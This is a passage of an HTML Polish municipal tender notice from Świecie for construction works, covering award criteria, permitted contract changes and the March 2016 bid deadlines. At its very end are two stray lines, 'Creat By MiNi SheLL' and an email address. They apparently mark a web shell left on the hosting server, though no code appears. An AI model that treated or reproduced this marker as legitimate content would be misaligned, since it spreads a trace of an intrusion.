5.	Pełnomocnictwo w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. (w przypadku składania oferty przez Wykonawców występujących  wspólnie należy załączyć pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i  zawarcia umowy w sprawie niniejszego zamówienia.
/ Wymagana forma dokumentu - oryginał lub kopia poświadczona notarialnie/</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dokona zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:
1)	zmiana terminu wykonania zamówienia w następujących przypadkach:
a)	o okres rozstrzygnięcia postępowania - odwołania,
b)	wystąpienie warunków atmosferycznych uniemożliwiających wykonywanie (prowadzenie) robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez Zamawiającego i inspektora nadzoru,
c)	działanie siły wyższej (np. klęski żywiołowej, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania robót,
d)	wstrzymanie robót przez inspektora nadzoru inwestorskiego (Zamawiającego),
e)	konieczność wykonania robót zamiennych na wniosek Zamawiającego,
f)	odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę,
g)	wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
h)	wystąpienia robót dodatkowych, określonych w art. 67 ust. 1 pkt 5 ustawy Pzp, których wykonanie będzie miało wpływ na przypadki wyszczególnione w pkt 2,
i)	wstrzymania robót przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę, np. dokonanie odkrywki archeologicznej, odkrycie niewypału itp.
j)	na skutek działań osób trzecich lub organów władzy publicznej, które spowodują przerwania lub czasowe zawieszenie realizacji zamówienia,
k)	zmiany będące następstwem działania organów administracji w szczególności wynikających z terminów wydania przez organy administracji decyzji, zezwoleń, uzgodnień, opinii, itp.,
l)	zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego,
m)	wystąpienie zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy i termin zakończenia robót,
n)	konieczność wykonania dokumentacji zamiennej,
o)	wystąpienie opóźnienia w przekazaniu placu budowy lub jego części a opóźnienie to będzie miało wpływ na termin zakończenia robót,
p)	zmiany technologii jakości lub parametrów charakterystycznych dla danego elementu, wprowadzanych na wniosek Wykonawcy,
q)	konieczność wykonania robót zamiennych, wprowadzanych na wniosek Wykonawcy lub Zamawiającego,
r)	w przypadku konieczności wykonania dodatkowych badań, ekspertyz, analiz itp.
2)	zmiany zakresu i sposobu wykonania przedmiotu zamówienia:
a)	zaistnienie okoliczności powodujących, że wykonanie umowy zgodnie z określonym zakresem w SIWZ nie jest możliwe, czego nie można było przewidzieć w chwili zawarcia umowy, wykonania dokumentacji zamiennej,
b)	zmiany przedmiotu zamówienia w przypadku wystąpienia robót zamiennych,
c)	rezygnacja z części robót lub zmiana ilości np.: wymienionych w pozycjach kosztorysów ofertowych,
3)	zmiany osobowe w zakresie pełnienia funkcji inspektorów nadzoru i kierownika budowy lub robót, legitymujących się, co najmniej równoważnymi uprawnieniami opisanymi w warunkach przetargowych lub wynikających z obowiązujących przepisów prawa,
4)	inne zmiany:
a)	w przypadku urzędowej zmiany stawki VAT strony zobowiązują się do zawarcia aneksu do umowy regulującego wysokość VAT, tym samym zmiany wynagrodzenia określonego w § 3 ust. 1 umowy, w tym koszty wzrostu podatku VAT pokrywa Wykonawca,
b)	zmiana nazwy zadania,
c)	wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy,
d)	zmiana rachunku Wykonawcy,
e)	zmiany podwykonawców lub wprowadzenie podwykonawców w przypadku braku ich wypełnienia w ofercie spełniających warunki lub wymagania opisane w specyfikacji istotnych warunków zamówienia (jeśli były opisane i Wykonawca składając ofertę polegał na zasobach innych podmiotów),
f)	zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
5)	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany.
6)	Nie stanowią zmian umowy w rozumieniu art.144 ustawy Pzp udzielanie zamówień dodatkowych określonych w przepisach ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.swiecie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świeciu, ul. Wojska Polskiego 124, 86 - 100 Świecie, pok. nr 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2016 godzina 09:00, miejsce: Urząd Miejski w Świeciu, ul. Wojska Polskiego 124, 86 - 100 Świecie, pok. nr 21 (I piętro, w sekretariacie).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert nastąpi dnia 15 marca 2016 o godz. 10:00, pok. nr 04 w budynku Wydziału Inwestycyjnego Urzędu Miejskiego w Świeciu, ul. Wojska Polskiego 124, 86 - 100 Świecie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com